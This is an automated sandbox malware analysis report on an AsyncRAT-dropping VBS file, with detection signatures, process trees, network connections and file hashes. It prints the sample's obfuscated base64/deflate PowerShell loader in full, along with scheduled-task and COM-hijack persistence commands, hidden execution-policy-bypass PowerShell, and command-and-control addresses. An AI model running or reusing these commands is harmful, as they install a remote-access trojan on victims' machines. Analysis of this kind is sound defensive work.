Malware Analysis Report

2024-11-30 19:35

Sample ID 240917-h2adcs1bjl
Target CSSA876245.vbs
SHA256 343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663
Tags
execution asyncrat sasa agilenet discovery persistence privilege_escalation rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663

Threat Level: Known bad

The file CSSA876245.vbs was found to be: Known bad.

Malicious Activity Summary

execution asyncrat sasa agilenet discovery persistence privilege_escalation rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Obfuscated with Agile.Net obfuscator

Event Triggered Execution: Component Object Model Hijacking

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Modifies registry key

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-17 07:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-17 07:13

Reported

2024-09-17 07:15

Platform

win7-20240903-en

Max time kernel

120s

Max time network

120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $zcxuqriwmospjyfktlgb

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | www1.coulmandental.com | udp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp

Files

memory/2360-4-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

memory/2360-5-0x000000001B820000-0x000000001BB02000-memory.dmp

memory/2360-6-0x00000000004B0000-0x00000000004B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5e7e0ac6cf0ae479e0d8bbd7f214b26c
SHA1 b408c68964283271d298a846965ffd29e1b1bf44
SHA256 87d2b73b5be9ccc9602c3e81370536e8718cd0d54d1439e24333fdc74c0208b5
SHA512 1b5458285923e5456a6eb77c6cc4a396c515dfb5d7195231d62fea64c3e410cb33ce28d77a5d84edd02be5de41360af6b83635afb8ca44150fffec8849738ff0

memory/2360-12-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2360-13-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

memory/2360-14-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2360-15-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-17 07:13

Reported

2024-09-17 07:15

Platform

win10v2004-20240802-en

Max time kernel

121s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Obfuscated with Agile.Net obfuscator

agilenet
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1920 wrote to memory of 3956 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 3956 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3956 wrote to memory of 3528 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3956 wrote to memory of 3528 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 2308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 3528 wrote to memory of 2308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 3388 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 3388 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2796 wrote to memory of 4280 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 4280 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 1196 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 1196 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 464 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2796 wrote to memory of 464 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 464 wrote to memory of 1712 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 1712 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 3836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 1712 wrote to memory of 3836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 1712 wrote to memory of 3836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 1712 wrote to memory of 3836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('<base64 string identical to the powershell.exe command line listed under Analysis: behavioral1, Processes>'));powershell $zcxuqriwmospjyfktlgb

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f

C:\Windows\system32\cmd.exe

cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp
US | 8.8.8.8:53 | www1.coulmandental.com | udp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp
US | 8.8.8.8:53 | 212.83.192.34.in-addr.arpa | udp
US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp
US | 88.119.175.153:6606 | N/A | tcp
US | 8.8.8.8:53 | 153.175.119.88.in-addr.arpa | udp
US | 88.119.175.153:6606 | N/A | tcp

Files

memory/3956-0-0x00007FFAED523000-0x00007FFAED525000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1ohuera.zjr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3956-6-0x0000021842910000-0x0000021842932000-memory.dmp

memory/3956-11-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp

memory/3956-12-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp

memory/3956-22-0x00007FFAED523000-0x00007FFAED525000-memory.dmp

memory/3956-23-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8d089c855358969266a3275f0ec4f955
SHA1 5ce30b598cfa0c2008541b1b549673401971dc3d
SHA256 e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734
SHA512 f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320

memory/3956-32-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp

C:\ProgramData\Cloud\cloud.vbs

MD5 7079642a22a106d0ed6f227cc70899ae
SHA1 60dd57af3518c0ea4104379ad233b5982b231283
SHA256 b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724
SHA512 ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80

C:\ProgramData\Cloud\cloud.bat

MD5 b8bdfc7895feaaacba3711d17be6778a
SHA1 fa0bc12827b348fe540a13683897deb207650df7
SHA256 e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3
SHA512 ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156

C:\ProgramData\Cloud\cloud.ps1

MD5 81fe8fe5684ecf16d936250bb94c852a
SHA1 a0a18d8d75e12546baa0b7dfd0dfb02dbefbac40
SHA256 ca0713d77d71359ff692385a2bb92e0b22fe7f0db9a356fd4ffbbfeb34911584
SHA512 d0a35efecc947e2e5d99d3f58a494693d5ebd48635f749f87f341e0a1ce965b7a413754a0316c973eebac4c8e8a12315a916adbc4350a0819132debde1ea7013

memory/1712-46-0x0000022CEA330000-0x0000022CEA33E000-memory.dmp

memory/3836-47-0x00000000009C0000-0x00000000009D8000-memory.dmp

memory/3836-49-0x0000000005100000-0x0000000005116000-memory.dmp

memory/3836-50-0x00000000059D0000-0x0000000005F74000-memory.dmp

memory/3836-51-0x0000000005610000-0x00000000056A2000-memory.dmp

memory/3836-52-0x0000000005600000-0x000000000560A000-memory.dmp

memory/3836-53-0x0000000006080000-0x000000000611C000-memory.dmp

memory/3836-54-0x00000000062C0000-0x0000000006326000-memory.dmp